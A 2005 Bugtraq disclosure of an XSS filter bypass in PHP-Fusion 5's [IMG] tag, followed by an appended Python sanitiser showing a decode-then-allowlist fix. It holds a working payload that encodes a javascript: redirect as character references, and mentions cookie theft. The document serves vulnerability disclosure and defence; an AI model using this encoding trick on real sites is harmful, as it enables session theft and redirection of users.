
List:       bugtraq
Subject:    PHP-FUSION 5.* XSS VULNERABILITY
From:       FireSt0rm <firest0rm.uh () gmail ! com>
Date:       2005-03-06 16:58:45
Message-ID: 20050306165845.9938.qmail () www ! securityfocus ! com

I found an exploit in the current version of php-fusion which allows you to input XSS in the [IMG] tag. I reported it already to php-fusion and they created a fix for this. Here it goes:

By converting the text (i.e. javascript:alert('test')) to their ASCII values, the strings between the [img][/img] tags aren't checked by the filter. And this way, you can send it and it will be executed.

You can do other things like display cookies, steal cookies, redirections etc.

EXAMPLE:

[IMG]javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'[/IMG]


would be replaced by

[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG]


FIX:

Filter out characters like '&' and '#'.
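The following is an added example, not code from the post or from PHP-Fusion, written in Python rather than PHP so it can be run stand-alone. It shows the defensive pattern the bypass above argues for: decode the character references the browser will decode (including the semicolon-less `&#106` form shown in the post) before validating, then allow only http(s) image URLs instead of rejecting individual characters like `&` and `#`, which would also break legitimate URLs that carry a query string. The function names, the `ALLOWED_SCHEMES` set and the `[img removed]` placeholder are my own choices; the test payload is the post's example URL re-encoded the same way the post shows it.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes an [img] URL may use. Everything else (javascript:, data:, file:, ...)
# is rejected. An allowlist of schemes is checked after decoding, so the
# encoding tricks the post describes no longer matter.
ALLOWED_SCHEMES = {"http", "https"}

# BBCode image tag, case-insensitive, non-greedy so several tags in one post work.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def normalize_url(raw: str) -> str:
    """Undo the encodings a browser will undo before it interprets the URL.

    html.unescape resolves named, decimal (&#106; as well as the semicolon-less
    &#106 form used in the post) and hexadecimal (&#x6a;) character references.
    It is applied until the text stops changing so double-encoded input cannot
    hide the scheme. Whitespace and control characters are dropped because
    browsers ignore them inside the scheme part of a URL.
    """
    url = raw
    for _ in range(5):  # bounded: stop as soon as decoding reaches a fixed point
        decoded = html.unescape(url)
        if decoded == url:
            break
        url = decoded
    return "".join(ch for ch in url if not ch.isspace() and ord(ch) >= 0x20)


def is_safe_image_url(raw: str) -> bool:
    """Accept only absolute http(s) URLs, judged after normalisation."""
    parts = urlsplit(normalize_url(raw))
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def sanitize_bbcode(text: str) -> str:
    """Drop every [img] tag whose URL fails the check; keep everything else verbatim."""
    def replace(match: re.Match) -> str:
        return match.group(0) if is_safe_image_url(match.group(1)) else "[img removed]"
    return IMG_TAG.sub(replace, text)


# Constructed test input: the URL from the post, re-encoded here exactly the way
# the post shows it (decimal references without trailing semicolons).
PLAIN_PAYLOAD = "javascript:document.location='http://www.albinoblacksheep.com/flash/you.html'"
ENCODED_PAYLOAD = "".join(f"&#{ord(ch)}" for ch in PLAIN_PAYLOAD)


if __name__ == "__main__":
    for candidate in (PLAIN_PAYLOAD, ENCODED_PAYLOAD, "http://example.com/pic.png?a=1&b=2"):
        print(is_safe_image_url(candidate), normalize_url(candidate)[:40])
    print(sanitize_bbcode(f"hello [IMG]{ENCODED_PAYLOAD}[/IMG] world"))
```

The order of operations is the point: validation happens on the decoded, whitespace-stripped string, i.e. on what the browser will actually see, and the decision is an allowlist of schemes rather than a blocklist of characters, so `http://example.com/pic.png?a=1&b=2` still passes while the encoded payload does not.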

